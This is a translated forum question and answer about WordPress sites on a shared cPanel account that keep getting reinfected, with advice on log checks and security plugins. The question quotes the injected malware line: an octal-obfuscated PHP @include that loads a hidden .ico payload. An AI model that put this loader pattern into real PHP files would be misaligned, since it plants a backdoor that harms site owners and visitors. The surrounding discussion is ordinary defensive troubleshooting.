这是问题所在。我要在1个托管网站中托管大约20个Wordpress网站。当我清除一个网站的病毒(.ico文件将代码注入index.php)时,另一个已经清除的网站又被注入了(大约数小时或数天)。
对所有sql库进行备份并删除所有文件的解决方案-对我不起作用-因为在某些网站中是我的小自定义脚本(没什么,只是在html中作了很小的更改,很确定我没有错误地创建漏洞)
所以我的问题是:
是否可以在cPanel中分离主目录,以便每个网站都可以彼此分离?
如果否,将文件管理器中的权限更改为例如544将停止编辑文件?
是否有关于永久删除此hack和所有后门程序的其他解决方案?
因为现在我看到的唯一解决方案是下载1个网站,删除所有文件,只需保留wp-content和theme文件夹,在新的主机上安装新的wordpress并将其保留在那里。但是,购买20个不同的托管帐户仍然会有点贵。
对于任何想法都会非常感谢!
P.S。在index.php中注入代码的示例
/*73c7c*/
@include "\057h\157m\145/\164i\156y\164o\162r\057s\141m\160l\145s\162.\165s\057w\160-\143o\156t\145n\164/\1673\164c\055c\157n\146i\147/\0568\062d\1441\1468\145.\151c\157";
/*73c7c*/
答案 0 :(得分:1)
您应该检查日志,看看攻击者利用了哪种类型的漏洞。如果您只是清洁,重新安装wordpress等,这些网站将永远被黑。您必须找到该漏洞并进行修补,以免再次遭到黑客入侵。您确实无法分离网站,因为您将它们放在同一个cPanel帐户中,只要它们属于完全相同的用户,就不会影响它们在哪个文件夹中,或者它们是否具有不同的文件夹。
我会安装一个安全的wordpress插件,例如Sucuri,Wordfence或BulletProof Security。这些插件提高了您的wordpress的安全性,添加了一些调整和一些额外的安全性设置,以防止此类攻击。他们还具有审核工具和日志记录,因此您可能会更好地了解漏洞的确切含义以及可能的修补方式。
我将以BPS为起点,并观察其运作方式。它为您的.htaccess文件添加了很多规则,这些规则将提高您的wordpress网站安全性并保护其免受各种攻击,xss / css注入等。
Wordpress是一个很棒的CMS,但是由于它被广泛使用,因此它可能是bot,爬虫,扫描程序,黑客等攻击者最关注的平台之一。通常,由于主题或插件,不正确的文件,Wordpress会遭到黑客入侵或破坏权限。